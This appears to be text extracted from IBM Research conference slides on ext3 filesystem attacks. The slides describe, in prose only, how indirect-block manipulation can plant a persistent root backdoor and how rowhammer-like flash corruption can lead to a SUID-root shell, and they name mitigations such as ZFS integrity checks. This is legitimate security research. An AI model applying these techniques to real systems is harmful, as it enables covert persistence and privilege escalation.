anıl kurmuş pacsec3

A �lesystem attack vectorfor backdoors, rowhammer-like attacks, and

more.

Anil Kurmus

with Nikolas Ioannou, Matthias Neugschwandtner,Nikolaos Papandreou and Thomas Parnell

IBM Research - Zurich

This talkIntroduces �lesystem-tricks that can be used in two

attack scenarios (on ext3):

1. Persistence without tampering binaries/con�g2. Privilege escalation assuming rowhammer-like

attacks on storage media

Outline1. Indirect block manipulation on ext32. Persistence backdoor3. Privesc for rowhammer-like attacks

Primer on ext3... and similar indirect-block-based �lesystems

Inodes

Indirect blocks

Indirect blockmanipulation

It's a pointer... we can and should corrupt it!

Application #1

Persistence backdoorImplant a backdoor to persist root access acrossreboots without modifying system �les, binaries,

con�g �les.

Threat modelAssume attacker has raw disk access (root access)

IdeaCreate "backdoor" �leUpdate its inode: indirect block points to inodetablePersistence achieved!

On rebootWrite into the "backdoor" �leUpdates inode of another �le: for example ashellGet root by creating a suid-root shellDone!

Live demo

Application #2

Flash primer

Flash weaknessesProgram/Erase wearCharge loss over timeCell-to-cell interferenceRead disturb

All were demonstrated, characterized

Cell-to-cell interference

MitigationsScramblerBlock allocation/wear levelingError correcting codes (ECC)

Implemented in SSDs

Flash storage layers1. Flash chip2. Flash controller3. SSD controller4. OS (�lesystem/driver)5. User

A path to rowhammer-likeattacks on �ash

1. Flash chip: cell-to-cell interference.2. Flash controller: scrambler and ECC bypass.3. SSD Controller: wear leveling and block

placement algorithm.4. OS: �lesystem caching and error detection

bypass.5. User: privilege escalation payload.

Prior work1. [Flash chip: cell-to-cell interference.]2. Flash controller: [scrambler] and ECC bypass.3. SSD Controller: wear leveling and block

placement algorithm.4. OS: �lesystem caching and error detection

bypass.5. User: privilege escalation payload.

Our WOOT paper1. Flash chip: cell-to-cell interference.2. Flash controller: scrambler and ECC bypass.3. SSD Controller: wear leveling and block

placement algorithm.4. OS: �lesystem caching and error detection

bypass.5. User: privilege escalation payload.

Flash ECCLong codewords (e.g., >1KB)High correction capability (e.g., >50 bits)

Codewords

Codewords

Codewords

Codewords

Extremely di�cult to achieve this!

The �lesystem attackAssumes:

Attacker can corrupt chosen blockrandom contents (weaker)ext3 �lesystem

Filesystem attackMain idea:

Cause corruption of indirect blockGood chance one pointer points to inode tableOverwrite inode to set SUID-bit rootElevate by executing SUID-root shell

Inodes, indirect blocks

Indirect block corruption

Overwrite inode entries

Attack demohttps://www.youtube.com/watch?v=Mnzp1p9Nvw0

Improved attackUses double indirect block insteadAchieves full �lesystem read/write99% success

Limitations & Mitigationsunclear whether applicable beyond ext3data integrity checks prevent the attack (ZFS)more in the paper

Conclusion 1/2Random corruption of a chosen block impliesprivilege escalation

with high probability on ext3There is a path to rowhammer-like attacks onSSDs

but none demonstrated yetThis is one piece of the puzzle: the �lesystempart.

Conclusion 2/2The technique is nevertheless applicable in otherdomains:

persistence without modifying binaries/con�g�lesactive attacks against XTS encryption? (futurework!)

We can do neat attacks by manipulating fspointers!